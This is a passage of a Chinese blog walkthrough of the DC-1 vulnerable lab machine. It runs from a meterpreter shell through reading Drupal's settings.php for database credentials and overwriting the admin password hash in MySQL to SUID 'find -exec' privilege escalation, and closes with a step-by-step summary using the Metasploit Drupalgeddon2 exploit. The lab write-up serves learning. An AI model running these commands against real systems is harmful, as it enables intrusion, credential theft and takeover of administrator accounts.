100644/rw-r--r-- 3092376453840 fil 188498731153-02-08 21:33:43 -0500 cron.php
100644/rw-r--r-- 223338299444 fil 211037522224-07-25 00:21:02 -0400 flag1.txt
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 includes
100644/rw-r--r-- 2272037700113 fil 188498731153-02-08 21:33:43 -0500 index.php
100644/rw-r--r-- 3019362009791 fil 188498731153-02-08 21:33:43 -0500 install.php
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 misc
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 modules
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 profiles
100644/rw-r--r-- 6704443950617 fil 188498731153-02-08 21:33:43 -0500 robots.txt
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 scripts
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 sites
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 themes
100644/rw-r--r-- 85645942869477 fil 188498731153-02-08 21:33:43 -0500 update.php
100644/rw-r--r-- 9354438772866 fil 188498731153-02-08 21:33:43 -0500 web.config
100644/rw-r--r-- 1791001362849 fil 188498731153-02-08 21:33:43 -0500 xmlrpc.php
</code></pre>获取到shellls看到有一个flag1.txt<pre><code>meterpreter &gt; cat flag1.txt
Every good CMS needs a config file - and so do you.</code></pre><h2>修改数据&&登录网站</h2>询问AI这个flag内容是什么意思<img src="http://happyprimes.cn/blog/usr/uploads/2025/10/1608436928.png" alt="![image-20251013153003716](I:\01_渗透\02_笔记\DC-1.assets\image-20251013153003716.png)" title="![image-20251013153003716](I:\01_渗透\02_笔记\DC-1.assets\image-20251013153003716.png)" style=""><code>cat sites/default/settings.php</code><pre><code>&lt;?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
 'default' =&gt; 
 array (
 'default' =&gt; 
 array (
 'database' =&gt; 'drupaldb',
 'username' =&gt; 'dbuser',
 'password' =&gt; 'R0ck3t',
 'host' =&gt; 'localhost',
 'port' =&gt; '',
 'driver' =&gt; 'mysql',
 'prefix' =&gt; '',
 ),
 ),
);
</code></pre>获得到flag2<pre><code> * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?</code></pre><img src="http://happyprimes.cn/blog/usr/uploads/2025/10/3852041508.png" alt="![image-20251013153409255](I:\01_渗透\02_笔记\DC-1.assets\image-20251013153409255.png)" title="![image-20251013153409255](I:\01_渗透\02_笔记\DC-1.assets\image-20251013153409255.png)" style=""><ul><li>用户名: <code>dbuser</code></li><li>密码: <code>R0ck3t</code></li><li>数据库: <code>drupaldb</code></li></ul>现在我们还是在meterpreter的命令行中，可以输入下面的命令进入到目标主机的shell中<code>meterpreter &gt; shell -t</code><pre><code>[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 3415 created.
Channel 3 created.
www-data@DC-1:/var/www$ </code></pre>经典界面<code>mysql -u dbuser -pR0ck3t -D drupaldb</code><code>select * from users;</code><img src="http://happyprimes.cn/blog/usr/uploads/2025/10/565580077.png" alt="![image-20251013192836648](I:\01_渗透\02_笔记\DC-1.assets\image-20251013192836648.png)" title="![image-20251013192836648](I:\01_渗透\02_笔记\DC-1.assets\image-20251013192836648.png)" style="">修改admin的密码哈希，我们需要知道哈希方式<a class="no-external-link" href="https://drupalchina.cn/node/2128" target="_blank">分享：忘记Drupal的管理员密码的解决办法 | Drupal China</a>按照里面的方法<img src="http://happyprimes.cn/blog/usr/uploads/2025/10/871168734.png" alt="![image-20251013202119573](I:\01_渗透\02_笔记\DC-1.assets\image-20251013202119573.png)" title="![image-20251013202119573](I:\01_渗透\02_笔记\DC-1.assets\image-20251013202119573.png)" style=""><code>php scripts/password-hash.sh 123456</code>获取到新密码123456的哈希去到mysql里面修改<code>mysql&gt; use database;</code><code>mysql&gt; update users set pass=&quot;$S$D9n2ArcXobfFvuoCXXK4c4tz93ndGPLdEOMqZ9brSnwhJjwFagtC&quot; where name=&quot;admin&quot;;</code>然后就可以登上网站<img src="http://happyprimes.cn/blog/usr/uploads/2025/10/1518514947.png" alt="![image-20251014095505499](I:\01_渗透\02_笔记\DC-1.assets\image-20251014095505499.png)" title="![image-20251014095505499](I:\01_渗透\02_笔记\DC-1.assets\image-20251014095505499.png)" style=""><pre><code>flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.</code></pre><h2>利用系统漏洞&&提升权限</h2>将flag3.txt内容询问AI<img src="http://happyprimes.cn/blog/usr/uploads/2025/10/4261849607.png" alt="![image-20251014100620039](I:\01_渗透\02_笔记\DC-1.assets\image-20251014100620039.png)" title="![image-20251014100620039](I:\01_渗透\02_笔记\DC-1.assets\image-20251014100620039.png)" style="">执行<code>/var/www$ find / -perm -4000</code>发现find有root权限，其有参数-exec，可以执行任意指令<code>/usr/bin/find /etc/passwd -exec whoami \;</code>返回root，再次确认可以提权<code>/usr/bin/find /etc/passwd -exec /bin/bash -p \;</code><img src="http://happyprimes.cn/blog/usr/uploads/2025/10/1217661892.png" alt="![image-20251014101418320](I:\01_渗透\02_笔记\DC-1.assets\image-20251014101418320.png)" title="![image-20251014101418320](I:\01_渗透\02_笔记\DC-1.assets\image-20251014101418320.png)" style="">在root权限中，访问/root目录得到flag<pre><code>bash-4.2# cd /
bash-4.2# cd root
bash-4.2# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7</code></pre>如果是普通www用户访问不了/root目录<img src="http://happyprimes.cn/blog/usr/uploads/2025/10/1132785048.png" alt="![image-20251014101715350](I:\01_渗透\02_笔记\DC-1.assets\image-20251014101715350.png)" title="![image-20251014101715350](I:\01_渗透\02_笔记\DC-1.assets\image-20251014101715350.png)" style=""><h2>总结</h2>加入一个局域网后<ol><li>扫描同网段下的ip<pre><code>sudo netdiscover</code></pre></li></ol><ol start="2"><li>扫描目标ip的端口<pre><code>nmap -sV [目标ip]</code></pre></li></ol><ol start="3"><li>扫描网站技术栈<pre><code>whatweb http://[目标ip]/</code></pre></li></ol><ol start="4"><li>利用漏洞<pre><code>msfconsole
# 搜索目标过时技术栈
msf &gt; search drupal
# 使用漏洞
msf &gt; use exploit/unix/webapp/drupal_drupalgeddon2
# 查看必填项
msf exploit(unix/webapp/drupal_drupalgeddon2) &gt; show options
# 填充必选项
msf exploit(unix/webapp/drupal_drupalgeddon2) &gt; set RHOST [目标ip]
# 查看攻击payload（可以选择）
msf exploit(unix/webapp/drupal_drupalgeddon2) &gt; show payloads
# 开始攻击
msf exploit(unix/webapp/drupal_drupalgeddon2) &gt; exploit</code></pre></li></ol><ol start="5"><li>getshell<pre><code>shell -t</code></pre></li></ol><ol start="6"><li>查看配置<pre><code>cat sites/default/settings.php</code></pre></li></ol><ol start="7"><li>登录mysql<pre><code>mysql -u [账号] -p[密码] -D [数据库]</code></pre></li></ol><ol start="8"><li>获取特定哈希算法的哈希值<pre><code>php scripts/password-hash.sh 123456</code></pre></li></ol><ol start="9"><li>修改数据库存储的密码哈希值<pre><code>mysql&gt; use database;
# 改
mysql&gt; update users set pass=&quot;$S$D9n2ArcXobfFvuoCXXK4c4tz93ndGPLdEOMqZ9brSnwhJjwFagtC&quot; where name=&quot;admin&quot;;</code></pre></li></ol><ol start="10"><li>系统提权<pre><code># 查看哪些命令有管理员权限
/var/www$ find / -perm -4000
# 确认find是拥有root权限
/usr/bin/find /etc/passwd -exec whoami \;
# find提权
/usr/bin/find /etc/passwd -exec /bin/bash -p \;</code></pre></li></ol>

DC-1靶机渗透实战走远了但我又走近了

DC-1

信息搜集&&目录扫描

寻找漏洞&&利用漏洞get shell

修改数据&&登录网站

利用系统漏洞&&提升权限

总结

数证杯初赛服务器取证

how to 将信息转化为椭圆曲线上的点

how to 出密码动态题

断网线下+不是自己电脑系列——简单密码题

what is Legendre Symbol （二次特征）

how to 将信息转化为椭圆曲线上的点

断网线下+不是自己电脑系列——简单密码题

DC-1靶机渗透实战走远了但我又走近了

DC-2靶机渗透实战：从 WordPress 到 Root 权限的完整攻防

what is Legendre Symbol （二次特征）

DC-1靶机渗透实战走远了但我又走近了

DC-1

信息搜集&&目录扫描

寻找漏洞&&利用漏洞get shell

修改数据&&登录网站

利用系统漏洞&&提升权限

总结

DC-1靶机渗透实战 走远了但我又走近了

DC-1靶机渗透实战走远了但我又走近了